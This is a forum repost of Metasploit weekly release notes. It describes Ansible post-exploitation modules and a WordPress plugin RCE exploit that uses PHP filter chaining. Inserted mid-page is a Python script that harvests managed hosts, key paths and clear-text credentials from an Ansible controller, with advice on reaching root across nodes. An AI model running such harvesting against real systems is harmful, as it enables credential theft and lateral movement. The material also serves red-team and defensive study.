National Cyber Warfare Foundation (NCWF) Forums


Metasploit Weekly Wrap-Up 01 19 24


2024-01-19 21:41:51
milo
Red Team (CNA)



Unicode your way to a php payload and three modules to add to your playbook for Ansible


Metasploit Weekly Wrap-Up 01/19/24

Our own jheysel-r7 added an exploit that uses the fascinating technique of PHP filter chaining to prepend a payload through character-encoding conversions, and h00die et al. have added three new Ansible post modules to gather configuration information, read files, and deploy payloads. While none of them offers instantaneous answers across the universe, they will certainly help in red team exercises.


New module content (4)


Ansible Agent Payload Deployer (1 of 3 Ansible post modules)


Authors: h00die and n0tty

Type: Exploit

Pull request: #18627 contributed by h00die

Path: linux/local/ansible_node_deployer


Ansible Config Gather (2 of 3 Ansible post modules)


Author: h00die

Type: Post

Pull request: #18627 contributed by h00die

Path: linux/gather/ansible


Ansible Playbook Error Message File Reader (3 of 3 Ansible post modules)


Authors: h00die and rioasmara

Type: Post

Pull request: #18627 contributed by h00die

Path: linux/gather/ansible_playbook_error_message_file_reader


Description: This adds three post-exploitation modules for Ansible. Ansible Config Gather (linux/gather/ansible) collects information and configuration from a compromised Ansible controller. Ansible Playbook Error Message File Reader exploits an arbitrary file read that lets an attacker read the first line of a file (typically /etc/shadow) when the compromised account is configured with password-less sudo permissions. Ansible Agent Payload Deployer is an exploit that deploys a payload to all the nodes the controller manages.
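As an added example (not code from the page or from the Metasploit modules above), the following Python script shows the kind of information a config-gathering post module collects once it has a session on an Ansible controller: it resolves the active ansible.cfg using Ansible's documented lookup order, pulls out the inventory path, key file, vault password file and privilege-escalation settings, and parses an INI inventory to list every managed host and any clear-text credentials left in host or group variables. The ansible.cfg and inventory text are constructed for the example, and the function and variable names are the example's own, not the module's.

```python
"""Added example (not Metasploit or Ansible code): what a post module on a
compromised Ansible controller looks for. Config precedence is Ansible's
documented order; the sample ansible.cfg and inventory are constructed."""
import configparser
import os
import re
import shlex
from pathlib import Path

# Constructed sample ansible.cfg (paths and settings are illustrative).
SAMPLE_CFG = """
[defaults]
inventory = /etc/ansible/hosts
remote_user = ansible
private_key_file = /home/ansible/.ssh/id_ed25519
vault_password_file = /home/ansible/.vault_pass
host_key_checking = False

[privilege_escalation]
become = True
become_ask_pass = False
"""

# Constructed sample INI inventory: a host range plus embedded secrets.
SAMPLE_INVENTORY = """
[webservers]
web1 ansible_host=10.0.0.11 ansible_user=deploy
web2 ansible_host=10.0.0.12 ansible_password='Summer2023!'

[dbservers]
db[01:02].corp.local

[prod:children]
webservers
dbservers

[prod:vars]
ansible_become_password=root-pw-here
"""

# ansible.cfg settings that reveal where inventory, keys and the vault
# password live, and whether privilege escalation prompts for a password.
INTERESTING = {
    "defaults": ["inventory", "remote_user", "private_key_file",
                 "vault_password_file", "host_key_checking"],
    "privilege_escalation": ["become", "become_ask_pass"],
}
# Inventory variables that carry credentials in clear text.
SECRET_VARS = {"ansible_password", "ansible_ssh_pass", "ansible_become_password",
               "ansible_become_pass", "ansible_sudo_pass"}

def find_ansible_cfg(env, cwd, home, exists=os.path.isfile):
    """Resolve the active config the way Ansible does: ANSIBLE_CONFIG,
    ./ansible.cfg, ~/.ansible.cfg, /etc/ansible/ansible.cfg; None if absent."""
    candidates = [env["ANSIBLE_CONFIG"]] if env.get("ANSIBLE_CONFIG") else []
    candidates += [str(Path(cwd) / "ansible.cfg"), str(Path(home) / ".ansible.cfg"),
                   "/etc/ansible/ansible.cfg"]
    return next((p for p in candidates if exists(p)), None)

def summarize_cfg(text):
    """Return {'section.key': value} for the INTERESTING settings present."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.read_string(text)
    return {f"{s}.{k}": cp.get(s, k) for s, keys in INTERESTING.items()
            for k in keys if cp.has_option(s, k)}

_RANGE = re.compile(r"\[(\d+):(\d+)\]")

def expand_range(name):
    """Expand one numeric host range, e.g. db[01:02].x -> db01.x, db02.x."""
    m = _RANGE.search(name)
    if not m:
        return [name]
    lo, hi = m.group(1), m.group(2)
    return [name[:m.start()] + str(i).zfill(len(lo)) + name[m.end():]
            for i in range(int(lo), int(hi) + 1)]

def parse_ini_inventory(text):
    """Parse an INI inventory into {group: {hosts, children, vars}}."""
    groups, current, kind = {}, "ungrouped", "hosts"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line[0] == "[" and line[-1] == "]":          # [group] or [group:kind]
            current, _, kind = line[1:-1].partition(":")
            kind = kind or "hosts"
            groups.setdefault(current, {"hosts": {}, "children": [], "vars": {}})
            continue
        g = groups.setdefault(current, {"hosts": {}, "children": [], "vars": {}})
        if kind == "children":
            g["children"].append(line)
        elif kind == "vars":
            k, _, v = line.partition("=")
            g["vars"][k.strip()] = v.strip()
        else:                                           # host line with key=value vars
            tokens = shlex.split(line)
            hostvars = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
            for host in expand_range(tokens[0]):
                g["hosts"][host] = hostvars
    return groups

def managed_hosts(groups):
    """Every host the controller can reach, across all groups."""
    return {h for g in groups.values() for h in g["hosts"]}

def find_credentials(groups):
    """(owner, variable, value) for each clear-text credential in the inventory."""
    hits = [(name, k, v) for name, g in groups.items()
            for k, v in g["vars"].items() if k in SECRET_VARS]
    hits += [(host, k, v) for g in groups.values() for host, hv in g["hosts"].items()
             for k, v in hv.items() if k in SECRET_VARS]
    return hits

if __name__ == "__main__":
    inv = parse_ini_inventory(SAMPLE_INVENTORY)
    print("config:", summarize_cfg(SAMPLE_CFG))
    print("managed hosts:", sorted(managed_hosts(inv)))
    print("clear-text credentials:", find_credentials(inv))
```

The host set is what a payload deployer iterates over, and a vault_password_file in ansible.cfg or an ansible_become_password in group vars is usually the shortest route from a foothold on the controller to root on every managed node, so those are the findings to triage first.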


WordPress Backup Migration Plugin PHP Filter Chain RCE


Authors: Nex Team, Valentin Lobstein, and jheysel-r7

Type: Exploit

Pull request: #18633 contributed by jheysel-r7

Path: multi/http/wp_backup_migration_php_filter


Description: This adds an exploit module for an unauthenticated RCE in the WordPress plugin Backup Migration, versions 1.3.7 and earlier (fixed in 1.3.8), tracked as CVE-2023-6553. It also adds a library implementing PHP filter chaining, a technique that prepends attacker-chosen bytes to a string by chaining convert.iconv.* character-encoding conversions, each of which adds a known prefix; with base64 encode and decode steps between them, the chain assembles an arbitrary payload in front of the original data, so a file include or read primitive that accepts a php://filter wrapper can be turned into code execution.


Enhancements and features (2)



  • #18596 from dwelch-r7 - Updates multiple SMB modules to work with the upcoming SMB session type support. This beta functionality is currently behind a feature flag and can be enabled with features set smb_session_type true.

  • #18682 from adfoster-r7 - Add tests for Msf::Exploit::Local module types to ensure that sysinfo will not break again in the future.


Bugs fixed (2)



  • #18655 from adfoster-r7 - Ensures the module will automatically be used when the hierarchical search functionality is enabled and only one module result is found.

  • #18710 from adfoster-r7 - Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework's payload modules.


Documentation added (1)



  • #18702 from Sh3llSp4wn - Updates the documentation for the private and public fields in lib/metasploit/framework/credential.rb to be correct.


You can always find more documentation on our docsite at docs.metasploit.com.


Missing rn-* label on Github (1)





  • #18398 from errorxyz - Fixes deprecation warnings when running the auxiliary/admin/scada/modicon_password_recovery, auxiliary/scanner/lotus/lotus_domino_hashes, auxiliary/sniffer/psnuffle, exploits/unix/webapp/vbulletin_vote_sqli_exec exploit modules with a database connected.


Get it


As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.




Source: Rapid7
Source Link: https://blog.rapid7.com/2024/01/19/metasploit-weekly-wrap-up-01-19-24/





Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.